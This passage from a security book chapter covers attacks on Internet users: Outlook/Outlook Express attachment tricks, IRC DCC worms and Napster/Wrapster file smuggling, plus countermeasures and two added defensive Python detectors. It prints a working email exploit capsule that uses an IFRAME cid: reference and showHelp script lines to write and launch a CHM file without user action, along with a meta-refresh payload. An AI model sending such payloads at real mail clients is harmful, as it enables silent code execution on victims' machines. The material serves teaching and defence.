Risk Rating: 5
The people at malware.com suggested the phrase "force feeding" to describe the mechanism they proposed for downloading a file to a user's disk without his or her permission. The essence of malware.com's exploit is their claim that Outlook/OE ignores user input when asked to dispatch a file attachment to an email message. Normally, when an email attachment is launched from within the mail reader, Outlook/OE prompts the user to either Open, Save To Disk, or Cancel the action. Malware.com claimed that no matter what the user selected, the attachment was written to the Windows %temp% directory (C:\Windows\temp on Win 9x and C:\temp on NT). Win 2000's temp folders are per-user and are harder to pin down with regularity if it is cleanly installed and not upgraded. Once deposited, the file was launched using a clever trick: the HTML meta-refresh tag (<META HTTP-EQUIV="refresh">), which emulates the HTTP Refresh header and redirects the browser silently and automatically to the URL contained within the tag. For example:
<META HTTP-EQUIV="refresh" content="2;URL=">
This code embedded in a web page will bounce viewers to www.othersite.com. The "content=" syntax tells the browser how many seconds to wait before redirecting. Malware.com simply pointed the meta-refresh at one of the local files it deposited via force-feeding:
<meta http-equiv="refresh" content="5;
url=mhtml:file://C:\WINDOWS\TEMP\lunar.mhtml">
The lunar.mhtml file, force-fed as an attachment to the original message, contained a link to a "safe for scripting" ActiveX control that launched a second attachment, an executable called mars.exe. Roundabout, but effective.
In the Bugtraq thread covering this finding, at least two quite reputable security authorities disagreed on whether this phenomenon actually worked as advertised. Testing by the authors of this book produced erratic results, but supported the idea that the appropriate IE security zone (see earlier) used for mail reading in Outlook/OE had to be set to Low for this to occur, and it only occurred sporadically at that. We were successful at forcing an attachment to the temp directory on Win 98 SE and NT4 Workstation systems with zone security at Low on two occasions, but could not repeat this consistently. The mystery of force feeding à la malware.com remains unsolved.
This is a bit comforting. Think of the trouble this could cause in conjunction with
Georgi Guninski’s exploit for executing code within MS Office documents: attackers
could send the Office document containing malicious code as an attachment, and then
send a second message with the appropriate ActiveX tag embedded within the body of
the message that pointed to the %temp% folder where the attachment gets force-fed, like
it or not (Georgi actually pulls this off—within the same message. See the next attack).
Of course, as we've mentioned, the easy availability of free and anonymous file repository services on the Internet makes the downloading of code to local disk unnecessary. By pointing malicious email messages at exploit code available on one of these services, an attacker guarantees the availability of the second part of such an attack, and it is a virtually untraceable perch at that.
]
Using IFRAME to Write Attachments to TEMP
Popularity: 5
Simplicity: 9
Impact: 10
Risk Rating: 8
Georgi demonstrates his keen eye for seemingly small problems with broad implications in this, his #9 advisory of 2000. The key issue here is Outlook/OE's propensity to create files in the TEMP directory with a known name and arbitrary content, much like the mechanism proposed by malware.com. However, by leveraging other exploits he has developed, including the Windows Help File shortcut execution vulnerability (.CHM files, see http://www.nat.bg/~joro/chm-desc.html) and the ever-useful IFRAME tag (see earlier), Georgi seems to have uncovered a consistent mechanism for delivering the goods, and a way to execute the downloaded code. Thus, we have given this exploit a Risk Rating of 8, among the highest of the ones we've discussed so far, because it comes the closest to being the total package: write a file to disk, then execute it without any user input.
The trick is the use of the IFRAME tag within the body of an email message that refer-
ences an attachment to the same message. For some peculiar reason that perhaps only
Georgi knows, when the IFRAME “touches” the attached file, it is flushed to disk. It is
then easy to call the file from a script embedded in the body of the very same message.
The file Georgi writes is a CHM file, which he has graciously configured to call
Wordpad.exe using an embedded “shortcut” command.
Here is a mail hacking capsule demonstrating the attack. Note that the CHM file has
to be prepacked using mpack (see the earlier section “Mail Hacking 101”).
helo somedomain.com
mail from: <>
rcpt to: <>
data
subject: This one takes the cake!
Importance: high
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="_boundary1_"
_boundary1_
Content-Type: multipart/alternative;
boundary="_boundary2_"
_boundary2_
Content-Type: text/html; charset=us-ascii
<IFRAME align=3Dbaseline alt=3D"" =
border=3D0 hspace=3D0=20
src=3D"cid:5551212"></IFRAME>
<SCRIPT>
setTimeout('window.showHelp("c:/windows/temp/abcde.chm");',1000);
setTimeout('window.showHelp("c:/temp/abcde.chm");',1000);
setTimeout('window.showHelp("C:/docume~1/admini~1/locals~1/temp/abcde.chm");
',1000);
</SCRIPT>
_boundary2_
_boundary1_
Content-Type: application/binary;
name="abcde.chm"
Content-ID: <5551212>
Content-Transfer-Encoding: base64
[Base64-encode abcde.chm using mpack and embed here]
_boundary1_
.
quit
In the authors' testing of this attack against Windows 9x, NT, and 2000, Outlook, and Outlook Express, this exploit was triggered flawlessly, most often when simply previewed (the three lines beginning with "setTimeout" each try the default TEMP path of one of those OSes; can you tell which is for which?).
The key item in this code listing is the Content-ID field, populated with the nonce
5551212 in our example. The src of the IFRAME in the body of the email refers to the ID of
the MIME attachment of the same message, creating a nice circular reference that allows
the attachment to be written to disk and called by the same malicious email message.
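Both self-referencing tricks in this section, the meta-refresh aimed at a local file in the force-feeding attack and the IFRAME src="cid:" reference to an attachment of the same message, are easy to pick out of a raw message on the wire. The following Python script is an added example, not code from this book, from Georgi Guninski, or from malware.com: it parses a constructed message in the capsule format with the standard library's email module, maps each attachment by its Content-ID, and reports HTML references that resolve back to those attachments or out to local files. The sample message, the regular expressions, and the function name find_capsule_indicators are assumptions made for the example.

```python
import re
from email import message_from_bytes, policy

# Constructed message in the shape of the chapter's "mail hacking capsule":
# an HTML body whose IFRAME src points at the Content-ID of an attachment in
# the same message, plus a meta-refresh aimed at a local file. The attachment
# body is four bytes of filler, not a real CHM; nothing here is executable.
SAMPLE_CAPSULE = b"\r\n".join([
    b"From: someone@somedomain.com",
    b"Subject: This one takes the cake!",
    b"MIME-Version: 1.0",
    b'Content-Type: multipart/mixed; boundary="_boundary1_"',
    b"",
    b"--_boundary1_",
    b"Content-Type: text/html; charset=us-ascii",
    b"",
    b'<IFRAME src="cid:5551212" width=0 height=0></IFRAME>',
    b'<meta http-equiv="refresh" content="5;url=mhtml:file://C:\\WINDOWS\\TEMP\\abcde.mhtml">',
    b"--_boundary1_",
    b'Content-Type: application/binary; name="abcde.chm"',
    b"Content-ID: <5551212>",
    b"Content-Transfer-Encoding: base64",
    b"",
    b"AAAA",
    b"--_boundary1_--",
    b"",
])

# Attribute values that reach back into the same message (src="cid:...") or
# out to the local disk (url=file:..., mhtml:file:...). These are patterns
# chosen for this example; a production filter would cover more attributes.
CID_REF = re.compile(r"""(?:src|data|href)\s*=\s*["']?cid:([^"'\s>]+)""", re.I)
LOCAL_REF = re.compile(r"""(?:src|data|url)\s*=\s*["']?((?:mhtml:)?file:[^"'\s>]+)""", re.I)


def find_capsule_indicators(raw_message):
    """Parse a raw RFC 822 message and return the indicators this example looks for:
    ('cid-self-reference', cid, content_type, filename) for every HTML reference
    that resolves to an attachment of the same message, and
    ('local-file-reference', target) for every redirect aimed at a local file."""
    msg = message_from_bytes(raw_message, policy=policy.default)
    attachments = {}     # Content-ID (without <>) -> (content type, filename)
    html_bodies = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        content_id = part.get("Content-ID")
        if content_id:
            key = content_id.strip().strip("<>")
            attachments[key] = (part.get_content_type(), part.get_filename())
        if part.get_content_type() == "text/html":
            html_bodies.append(part.get_content())
    findings = []
    for html in html_bodies:
        for cid in CID_REF.findall(html):
            if cid in attachments:          # the circular reference the text describes
                content_type, filename = attachments[cid]
                findings.append(("cid-self-reference", cid, content_type, filename))
        for target in LOCAL_REF.findall(html):
            findings.append(("local-file-reference", target))
    return findings


if __name__ == "__main__":
    for finding in find_capsule_indicators(SAMPLE_CAPSULE):
        print(*finding)
```

Run against the constructed capsule, the script reports one cid-self-reference (5551212, application/binary, abcde.chm) and one local-file-reference (the mhtml:file: target). A plain text message with no HTML part yields nothing, which is the point: legitimate mail that merely carries an attachment does not trip either check, while a body that reaches back into its own attachments or out to the local disk does.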
U
Countermeasure to IFRAME Attachment Stuffing
The only defense against this one is conscientious use of ActiveX, as explained in the section on security zones earlier. Microsoft has not released a patch.
IRC HACKING
Internet Relay Chat (IRC) remains one of the more popular applications on the Internet,
driven not only by the instant gratification of real-time communications, but also by the
ability to instantaneously exchange files using most modern IRC client software (our favorite is mIRC; see Chapter 14). This is where the trouble starts.
IRC newbies are often confused by the frequent offers of files from participants in a
channel. Many are sensible enough to decline offers from complete strangers, but the
very nature of IRC tends to melt this formality quickly. One of the authors’ relatives was
suckered by just such a ploy, a simple batch file that formatted his hard drive (his name
won't be provided to protect the innocent, and the reputation of the author whose own
flesh and blood should’ve known better!). Like innocuous mail attachments, however,
the problem is often more insidious, as we shall see next.
]
DCCed File Attacks
Popularity: 9
Simplicity: 9
Impact: 10
Risk Rating: 7
An interesting thread on such attacks appeared on the Incidents mailing list operated by Security Focus (look for the INCIDENTS Digest - 10 Jul 2000 to 11 Jul 2000, #2000-131). A curious user had been offered a file via DCC (on IRC, a method called DCC Send and DCC Get is used to connect directly to another IRC client to Send and Get files, instead of going through the IRC network). The file was named LIFE_STAGES.TXT (now where have we seen that before? Hint: Look back to the section on Windows scrap file attachments earlier.). Plainly, this was either a blatant attempt to cause damage to the user's system, or an automated attack sent by a compromised IRC client without its user's knowledge.
This is one of the features of IRC that disarms new users quickly. IRC clients that have
been compromised by a worm can embed themselves into the client’s automated script
routines, automatically DCCing themselves to anyone who joins a channel, without the
user at the terminal even knowing.
Furthermore, the worm discussed in the Incidents thread was likely tailored to set autoignore for known antivirus proponents when it joins certain channels. Such worms also autoignore people who write to the client about "infected," "life-stages," "remove," "virus," and many other trigger words. It can thus take time before the infected user can be warned of the problem without triggering the autoignore function.
U
DCC Countermeasures
Fortunately, the default behavior of most IRC clients is to download DCCed files to a user-specified download directory. The user must then navigate to this directory and manually launch the file.
Like email attachments, DCCed files should be regarded with extreme skepticism. Besides the usual culprits (.BAT, .COM, .EXE, .VBS, and .DLL files), watch out for Microsoft Office documents that may contain harmful macros, as well as IRC client automation Aliases, Popups, or Scripts that can take control of your client. Use of antivirus scanners for such files is highly recommended.
Attempting to trace malicious users on IRC is typically fruitless and a waste of time. As pointed out in the Incidents thread, most attackers connect to IRC using virtual hosts (vhost) via BNC (IRC Bouncer, basically an IRC proxy server). Thus, backtracing to a given IP may reveal not the user sitting behind a terminal, but rather the server running the BNC.
NAPSTER HACKING WITH WRAPSTER
Although we really don't consider Napster and Wrapster a huge security threat at this time, we thought both products demonstrate the simple ethos of hacking on a grand scale and just had to talk about them in our book. For those who already know what this is all about, jump to the next section. If you haven't heard of one or either, take a gander, and then try it for yourself. Regardless of how you feel about intellectual property and copyrights, the awesome convenience, selection, and instant gratification provided by Napster will surely expand your horizons.
Another example of the great potential for security conflagration brought about by the combination of power and popularity is the revolutionary distributed file-sharing network called Napster. Napster is a variation on a typical client-server file-sharing tool in which the server acts as a centralized index of MP3 audio files that exist on the hard drives of all the users connected to the network with the Napster client. Users search the index for an MP3 that they wish to download, and the server connects their client directly to the user(s) who actually possesses the file(s) that matches the query. Thus, all users who wish to participate in the bountiful goodness that is Napster must share out some portion of their hard drive and give other users access to it.
Napster attempts to keep non-MP3 files off the network to avoid potential spread of malware via the system. It does this by checking the binary headers of files copied over the network and verifying that they resemble the MP3 header format. Versions of Napster subsequent to beta 6 employ a new MP3 detection algorithm, one that checks for actual frames inside a file in addition to verifying the MP3 header.
Of course, the same human ingenuity that brought us Napster conceived of a way to smuggle non-MP3s over the network in short order. Wrapster, by Octavian (http://members.fortunecity.com/wrapster), hides file types, disguising them as legitimate MP3 files that are "encoded" at a specific bit rate (32 kbps), allowing them to be traded via the Napster network just like any other MP3. Users who want to see what's Wrapster-ized out there can simply search the Napster network for the bit rate defined earlier, and any available Wrapster files will pop up. Or, if you know what files your friend is sharing out, you can simply search by name and bit rate. We now have a distributed network where wildly popular music files trade hands like money and a mechanism for creating Trojans that resemble the music file format. Anyone see a reason to be cautious here?
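To make the difference between the two detection approaches concrete, here is an added Python example. It is not Napster's or Wrapster's code (the chapter does not describe their internals); it decodes the 32-bit MPEG-1 Layer III frame header, contrasts a header-only check with a frame-walk check that hops from frame to frame using each header's computed length, and runs both over two constructed byte strings: five back-to-back genuine-looking 32 kbps frames, and a single 32 kbps frame prepended to an arbitrary payload, which is how a disguise of the Wrapster kind looks to a header check. The bitrate and sample-rate tables are the standard ones for MPEG-1 Layer III; the sample data and the function names are this example's own assumptions.

```python
import struct

# MPEG-1 Layer III header tables. This added example handles only that case
# (the common "MP3"), which is enough to contrast a header-only check with a
# frame-walk check; other MPEG versions and layers are rejected as non-MP3.
BITRATES_KBPS = [None, 32, 40, 48, 56, 64, 80, 96, 112, 128, 160, 192, 224, 256, 320, None]
SAMPLE_RATES_HZ = [44100, 48000, 32000, None]


def parse_frame_header(buf, offset):
    """Decode the 4-byte frame header at buf[offset]. Returns
    (frame_length, bitrate_kbps, sample_rate_hz), or None if the bytes are
    not a valid MPEG-1 Layer III header."""
    if offset + 4 > len(buf):
        return None
    hdr = struct.unpack(">I", buf[offset:offset + 4])[0]
    if (hdr >> 21) & 0x7FF != 0x7FF:     # 11 frame-sync bits must all be set
        return None
    if (hdr >> 19) & 0x3 != 0b11:        # version ID: MPEG-1 only
        return None
    if (hdr >> 17) & 0x3 != 0b01:        # layer: III only
        return None
    bitrate = BITRATES_KBPS[(hdr >> 12) & 0xF]
    sample_rate = SAMPLE_RATES_HZ[(hdr >> 10) & 0x3]
    padding = (hdr >> 9) & 0x1
    if bitrate is None or sample_rate is None:   # "free" / "bad" table slots
        return None
    frame_length = 144 * bitrate * 1000 // sample_rate + padding
    return frame_length, bitrate, sample_rate


def header_only_check(buf):
    """The weak check: the file 'resembles' an MP3 if it starts with a valid frame header."""
    return parse_frame_header(buf, 0) is not None


def frame_walk_check(buf, min_frames=3):
    """The stronger check: use each header's computed length to hop to where the
    next header must be, and require min_frames consecutive valid headers.
    A forged header followed by an arbitrary payload fails at the second hop."""
    offset, frames = 0, 0
    while frames < min_frames:
        parsed = parse_frame_header(buf, offset)
        if parsed is None or offset + parsed[0] > len(buf):
            return False
        offset += parsed[0]
        frames += 1
    return True


def make_frame(bitrate_kbps=32, sample_rate_hz=44100):
    """Construct one frame: a valid header plus zero filler of the right length.
    Constructed test data, not encoder output; the filler is not real audio."""
    hdr = (0x7FF << 21) | (0b11 << 19) | (0b01 << 17) | (1 << 16)  # sync, MPEG-1, Layer III, no CRC
    hdr |= BITRATES_KBPS.index(bitrate_kbps) << 12
    hdr |= SAMPLE_RATES_HZ.index(sample_rate_hz) << 10
    frame_length = 144 * bitrate_kbps * 1000 // sample_rate_hz
    return struct.pack(">I", hdr) + b"\x00" * (frame_length - 4)


# Constructed samples. GENUINE_LIKE has five back-to-back 32 kbps frames.
# WRAPPED mimics the disguise: one genuine-looking 32 kbps frame in front of an
# arbitrary payload (here the first bytes of a hypothetical Win32 executable).
GENUINE_LIKE = make_frame() * 5
WRAPPED = make_frame() + b"MZ\x90\x00" + b"\x00" * 300


def classify(buf):
    """Report what each check says about a blob of bytes."""
    return {"header_only": header_only_check(buf), "frame_walk": frame_walk_check(buf)}


if __name__ == "__main__":
    for name, data in (("genuine-like", GENUINE_LIKE), ("wrapped", WRAPPED)):
        print(name, classify(data))
```

The header-only check accepts both samples, because the wrapped file really does start with a well-formed 32 kbps header. The frame walk accepts only the first: after hopping 104 bytes (the frame length for 32 kbps at 44.1 kHz) it lands on "MZ" instead of the next sync word. Note that a determined smuggler can still defeat a walk of a few frames by padding the payload into frame-sized chunks with a valid header in front of each, which is why, as the text says, the last barrier remains the human who decides whether to unwrap the file.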
Fortunately, Wrapster requires users to first manually extract the faux MP3 file using a helper application before it can be executed. Simply double-clicking on a Wrapster-encoded file will attempt to open it in the user's digital music player of choice, at which point it will be recognized as an illegitimate MP3 and fail to load. This shifts the burden from the technology to the user to correctly identify whether the enclosed file is dangerous or not. Once again, human judgment provides the only barrier between a great thing (free music) and a formatted hard disk.
So, if Napster is not a security concern today, it certainly illustrates how applications
and people make assumptions, and how it may be possible to bypass assumptions. We
hope our discussion has encouraged further analysis of such assumptions and further
use of Napster.
Various open-source clones of the Napster software package reportedly have a vulnerability by which an attacker could view files on a machine running a vulnerable Napster clone client (the official commercial version of Napster does not contain this vulnerability). See Bugtraq ID 1186.
GLOBAL COUNTERMEASURES TO INTERNET USER HACKING
We’ve discussed a lot of nasty techniques in this section on Internet user hacking, many
of which center around tricking users into running a virus, worm, or other malicious
code. We have also talked about many point solutions to such problems, but have
avoided until now discussions of broad-spectrum defense against such attacks.
Keep Antivirus Signatures Updated
Of course, such a defense exists and has been around for many years. It's called antivirus software, and if you're not running it on your system, you're taking a big risk. There are dozens of vendors to choose from when it comes to picking antivirus software, and Microsoft publishes a good list of them. Most of the major brand names (such as Symantec's Norton Antivirus, McAfee, Data Fellows, Trend Micro, Computer Associates' Inoculan/InoculateIT, and the like) do a similar job of keeping malicious code at bay.
The one major drawback to the method employed by antivirus software is that it does not proactively provide protection against new viruses that the software has not been taught how to recognize yet. Antivirus vendors rely on update mechanisms to periodically download new virus definitions to customers. Thus, there is a window of vulnerability between the first release of a new virus and the time a user updates virus definitions.
As long as you're aware of that window and you set your virus software to update itself automatically at regular intervals (weekly should do it), antivirus tools provide another strong layer of defense against much of what we've described earlier. Remember to enable the auto-protect features of your software to achieve full benefit, especially automatic email and floppy disk scanning. And keep the virus definitions up to date! Most vendors offer one free year of automatic virus updates, but then require renewal of automated subscriptions for a small fee thereafter. For example, Symantec charges around $4 for an annual renewal of its automatic LiveUpdate service. For those penny-pinchers in the audience, you can manually download virus updates from Symantec's web site for free.
Also, be aware of virus hoaxes, which can cause just as much damage as the viruses themselves; the antivirus vendors publish lists of known hoaxes.
Guarding the Gateways
The most efficient way to protect large numbers of users remains a tough network-layer
defense strategy. Of course, firewalls should be leveraged to the hilt in combating many
of the problems discussed in this chapter. In particular, pay attention to outbound access
control lists, which can provide critical stopping power to malicious code that seeks to
connect to rogue servers outside the castle walls.
In addition, many products are available that will scan incoming email or web traffic for malicious mobile code. One example is Finjan's SurfinGate technology (www.finjan.com), which sits on the network border (as a plug-in to existing firewalls or as a proxy) and scans all incoming Java, ActiveX, JavaScript, executable files, Visual Basic Script, plug-ins, and cookies. SurfinGate then builds a behavior profile based on the actions that each code module requests. Each module is uniquely identified by an MD5 hash so that repeated downloads of the same module only need to be scanned once. SurfinGate compares the behavior profile to a security policy designed by the network administrator, and then makes an "allow" or "block" decision based on the intersection of the profile and policy. Finjan also makes available a personal version of SurfinGate called SurfinGuard, which provides a sandbox-like environment in which to run downloaded code.
Finjan's is an interesting technology that pushes management of the mobile code problem away from overwhelmed and uninformed end-users. Its sandbox technology has the additional advantage of being able to catch executables processed by PE (portable executable) compressors, which compress Win32 .EXE files and in doing so change the binary signature of the executable. The original .EXE is never written back to disk in its original form; it is reconstituted in memory only when the packed file runs, so a static signature scan of the file on disk finds nothing to match (traditional antivirus signature checking won't catch it), whereas a sandbox that watches what the code does at run time still can. Of course, it is only as good as the policy or sandbox security parameters it runs under, which are still configured by those darned old humans responsible for so many of the mistakes we've covered in this chapter.
SUMMARY
After writing this chapter, we simultaneously wanted to breathe a sigh of relief and to dedicate years of further research into Internet user hacking. Indeed, we left a lot of highly publicized attack methodologies on the cutting room floor, due primarily to exhaustion at attempting to cover the scope of tried and untried attacks against common client software. In addition to dozens of other clever attacks from individuals like Georgi Guninski, some of the topics that barely missed the final cut include web-based mail service hacking (Hotmail), AOL user hacking, broadband Internet hacking, and hacking consumer privacy. Surely, the Internet community will be busy for years to come dealing with all of these problems, and those as yet unimagined. Here are some tips to keep users as secure as they can be in the meantime.
▼ Keep Internet client software updated! For Microsoft products often targeted by such attacks, there are several ways (in order of most effective use of time):
■ Windows Update (WU)
■ Microsoft Security Bulletins
■ Critical IE Patches (the "critical" section of the IE download page)
■ Office Products Security Patches
■ Microsoft Download Center (MDC), filtered on security patches
■ Obtain and regularly use antivirus software. Make sure the virus signatures are kept updated on a weekly basis, and set as many automated scanning features as you can tolerate (automatic scanning of downloaded email is one that should be configured).
■ Educate yourself on the potential dangers of mobile code technologies like ActiveX and Java, and configure your Internet client software to treat these powerful tools sensibly (see our discussion of Windows security zones in this chapter to learn how to do this). Good introductory articles on the implications of mobile code are widely available.